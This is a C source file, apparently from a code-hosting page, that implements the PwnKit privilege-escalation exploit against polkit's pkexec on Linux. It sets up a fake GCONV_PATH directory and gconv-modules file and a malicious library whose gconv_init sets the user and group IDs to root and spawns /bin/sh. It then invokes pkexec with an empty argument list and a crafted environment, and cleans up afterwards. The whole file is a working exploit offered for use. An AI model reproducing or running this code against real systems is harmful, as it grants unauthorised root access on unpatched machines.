You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
91 lines
2.1 KiB
91 lines
2.1 KiB
#include <errno.h>
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <unistd.h>
|
|
|
|
#include <sys/stat.h>
|
|
#include <sys/types.h>
|
|
#include <sys/wait.h>
|
|
|
|
const char service_interp[] __attribute__((section(".interp"))) = "/lib64/ld-linux-x86-64.so.2"; //jank to get this working
|
|
|
|
void print(const char string[]) {
|
|
fwrite(string, sizeof(char), strlen(string) + 1, stdout);
|
|
fwrite("\n", sizeof(char), strlen("\n"), stdout);
|
|
}
|
|
|
|
void gconv() {} //gconv thing
|
|
|
|
void gconv_init() {
|
|
print("pwned lol !");
|
|
setuid(0);
|
|
seteuid(0);
|
|
setgid(0);
|
|
setegid(0);
|
|
char *shellArgv[] = {"sh", NULL};
|
|
char *env[] = {
|
|
"PATH=/bin:/usr/bin:/sbin:/usr/sbin",
|
|
NULL
|
|
};
|
|
execve("/bin/sh", shellArgv, env);
|
|
}
|
|
|
|
void setup(char *argv[]) {
|
|
mkdir("GCONV_PATH=.", S_IRWXU | S_IRWXG | S_IROTH | S_IXOTH);
|
|
mkdir("pwn", S_IRWXU | S_IRWXG | S_IROTH | S_IXOTH);
|
|
FILE *fp = fopen("GCONV_PATH=./pwn", "w");
|
|
struct stat buf;
|
|
fstat(fileno(fp), &buf);
|
|
fchmod(fileno(fp), buf.st_mode | S_IXUSR | S_IXGRP | S_IXOTH );
|
|
fclose(fp);
|
|
system("/bin/cp pwnkit.so pwn/pwnkit.so"); //i cant be fucked
|
|
fp = fopen("pwn/gconv-modules", "w");
|
|
char *gconv = "module PWNKIT// INTERNAL pwnkit 2\n"
|
|
"module INTERNAL PWNKIT// pwnkit 2";
|
|
fputs(gconv, fp);
|
|
fclose(fp);
|
|
}
|
|
|
|
void clean() {
|
|
remove("GCONV_PATH=./pwn");
|
|
rmdir("GCONV_PATH=.");
|
|
remove("pwn/pwnkit.so");
|
|
remove("pwn/gconv-modules");
|
|
rmdir("pwn");
|
|
}
|
|
|
|
void runAndClean(char * const env[], char * const arg[]) {
|
|
int pid = fork();
|
|
if (pid == 0) {
|
|
execve("/usr/bin/pkexec", arg, env);
|
|
}
|
|
else {
|
|
int status;
|
|
waitpid(pid, &status, 0);
|
|
if (WEXITSTATUS(status) == 127 || WEXITSTATUS(status) == 1) {
|
|
print("[Pwnkit] Failed to execute pkexec, or it returned an error; your system is most likely patched!");
|
|
}
|
|
print("[Pwnkit] Cleaning up..");
|
|
clean();
|
|
}
|
|
}
|
|
|
|
int main(int argc, char *argv[]) {
|
|
print("[Pwnkit] Setting up directory structure..");
|
|
setup(argv);
|
|
print("[Pwnkit] Setting up environment variables..");
|
|
const char *env[] = {
|
|
"pwn",
|
|
"PATH=GCONV_PATH=.",
|
|
"CHARSET=pwnkit",
|
|
"SHELL=pwn",
|
|
"GIO_USE_VFS=",
|
|
NULL
|
|
};
|
|
const char *args[] = { NULL };
|
|
print("[Pwnkit] Pwning pkexec..");
|
|
runAndClean(env, args);
|
|
_exit(0);
|
|
}
|